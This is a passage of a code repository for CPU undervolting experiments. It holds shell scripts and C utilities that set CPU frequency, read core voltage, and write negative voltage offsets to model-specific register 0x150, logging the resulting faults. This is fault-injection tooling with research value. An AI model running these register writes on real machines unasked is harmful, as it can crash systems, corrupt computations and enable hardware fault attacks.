39 | 	printf "undervolting $undervoltage \t voltage: $floating_val\n" >> keeping_tab/fault_results
40 | 	sync
41 | 	sudo ~/undervolting/undervolt $undervoltage
42 | done  
43 | 


--------------------------------------------------------------------------------
/utils/keeping_tab/frequencies.txt:
--------------------------------------------------------------------------------
 1 | 0.3GHz (not used but as a starting reference for grep)
 2 | 0.4GHz
 3 | 0.5GHz
 4 | 0.6GHz
 5 | 0.7GHz
 6 | 0.8GHz
 7 | 0.9GHz
 8 | 1GHz
 9 | 1.1GHz
10 | 1.2GHz
11 | 1.3GHz
12 | 1.4GHz
13 | 1.5GHz
14 | 1.6GHz
15 | 1.7GHz
16 | 1.8GHz
17 | 1.9GHz
18 | 2GHz
19 | 2.1GHz
20 | 2.2GHz
21 | 2.3GHz
22 | 2.4GHz
23 | 


--------------------------------------------------------------------------------
/utils/keeping_tab/last_frequency_tested:
--------------------------------------------------------------------------------
1 | 0.3GHz
2 | 


--------------------------------------------------------------------------------
/utils/read_voltage.c:
--------------------------------------------------------------------------------
 1 | #include <curses.h>
 2 | #include <fcntl.h>
 3 | #include <inttypes.h>
 4 | #include <sys/ioctl.h>                
 5 | #include <stdio.h>
 6 | #include <stdlib.h>
 7 | #include <stdint.h>
 8 | #include <string.h>
 9 | #include <unistd.h>
10 | 
11 | int fd;
12 | uint64_t plane1=0x8000011000000000;
13 | uint64_t plane2=0x8000021000000000;
14 | 
15 | static double actual_voltage(uint64_t msr_response)
16 | {                                                                  
17 | 	double a = (double)((msr_response & 0xFFFF00000000)>>32);
18 |     	return a/8192.0;
19 | }  
20 | 
21 | double get_voltage()
22 | {
23 |        	uint64_t msr_198;
24 | 	pread(fd,&msr_198,sizeof msr_198,0x198);
25 | 	return actual_voltage(msr_198);
26 | }
27 | 
28 | int64_t unpack_offset(uint64_t msr_response)
29 | {
30 |         int64_t x=msr_response>>21;
31 |         double y;
32 |         if (x<1024)
33 |                 y=x/1.024;
34 |         else
35 |                 y=(2048-x)/1.024;
36 |         y=y+0.5; //rounding
37 |         y=y*-1; //make it negative
38 |         return (int)y;
39 | }
40 | 
41 | int64_t get_undervolting()
42 | {
43 |         uint64_t read_register;
44 |         pwrite(fd,&plane1,8,0x150);
45 |         pwrite(fd,&plane2,8,0x150);
46 |         pread(fd,&read_register,8,0x150);
47 |         return unpack_offset(read_register);
48 | }
49 | 
50 | int main(void) 
51 | {
52 | 	/* check we can open the msr */
53 |         fd = open("/dev/cpu/0/msr", O_RDWR);
54 |         if(fd == -1)
55 |         {
56 |                 printf("Could not open /dev/cpu/0/msr\n");
57 |                 return -1;
58 |         }
59 | 
60 | 
61 |     	/*  Initialize ncurses  */
62 |     	WINDOW * mainwin;
63 | 	if ( (mainwin = initscr()) == NULL ) 
64 | 	{
65 | 		fprintf(stderr, "Error initialising ncurses.\n");
66 | 		exit(EXIT_FAILURE);
67 |     	}
68 | 
69 | 	start_color();       /*  Initialize colours  */
70 | 	init_pair(1, COLOR_YELLOW,  COLOR_BLACK);
71 | 	init_pair(6, COLOR_BLUE,    COLOR_YELLOW);
72 | 	color_set(1, NULL);
73 | 	
74 | 	char printme[100];
75 | 	curs_set(0);
76 | 	while (1) 
77 | 	{
78 | 		sprintf(printme,"     Voltage\n      %.3fV\n\n   Undervolting\n      %limV        ",get_voltage(),get_undervolting());
79 | 	    	mvaddstr(6, 0, printme);
80 | 		refresh();
81 | 		sleep(1);
82 | 	}
83 | 
84 |     /*  Clean up */
85 |     delwin(mainwin);
86 |     endwin();
87 |     refresh();
88 |     return EXIT_SUCCESS;
89 | }
90 | 


--------------------------------------------------------------------------------
/utils/set_freq.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | if [ $# -ne 1 ] ; then
 3 | 	echo "Incorrect number of arguments" >&2
 4 | 	echo "Usage $0 <frequency>" >&2
 5 | 	echo "Example $0 1.6GHz" >&2
 6 |     exit
 7 | fi
 8 | sudo cpupower -c all frequency-set -u $1
 9 | sudo cpupower -c all frequency-set -d $1
10 | 
11 | echo "Sleeping to take effect.."
12 | sleep 1
13 | echo "Checking frequency..."
14 | grep "cpu MHz" /proc/cpuinfo
15 | 


--------------------------------------------------------------------------------
/utils/undervolt.c:
--------------------------------------------------------------------------------
 1 | #include <immintrin.h>
 2 | #include <stdint.h>
 3 | #include <x86intrin.h>
 4 | #include <stdio.h>
 5 | #include <fcntl.h>
 6 | #include <unistd.h>
 7 | #include <stdlib.h>
 8 | #include <inttypes.h>
 9 | 
10 | uint64_t msr_value(int64_t val,uint64_t plane)
11 | {
12 | 	//0.5 is to deal with rounding
13 | 	val=(val*1.024)-0.5;
14 | 	val=0xFFE00000&((val&0xFFF)<<21);
15 | 	val=val|0x8000001100000000;
16 | 	val=val|(plane<<40);
17 | 	return (uint64_t)val;
18 | }
19 | 
20 | 
21 | 
22 | int main (int argc, char* argv[])
23 | {
24 | 	const char* program = argv[0];
25 | 	int fd0;
26 | 
27 | 	if (argc != 2)
28 | 	{
29 | 		printf("Need 1 values: %s  offset\n",program);
30 | 		exit (-1);
31 | 	}
32 | 	int64_t offset_mV=strtol(argv[1],NULL,10);
33 | 	uint64_t val_plane0 = msr_value(offset_mV, 0);
34 | 	uint64_t val_plane2 = msr_value(offset_mV, 2);
35 | 
36 | 	// voltage drop
37 | 	fd0 = open("/dev/cpu/0/msr", O_WRONLY);
38 | 	if(fd0 == -1)
39 | 	{
40 | 		printf("Could not open /dev/cpu/0/msr\n");
41 | 		return -1;
42 | 	}
43 | 	pwrite(fd0,&val_plane0,8,0x150);
44 | 	pwrite(fd0,&val_plane2,8,0x150);
45 | 	close(fd0);
46 | 	return 0;
47 | }
48 | 


--------------------------------------------------------------------------------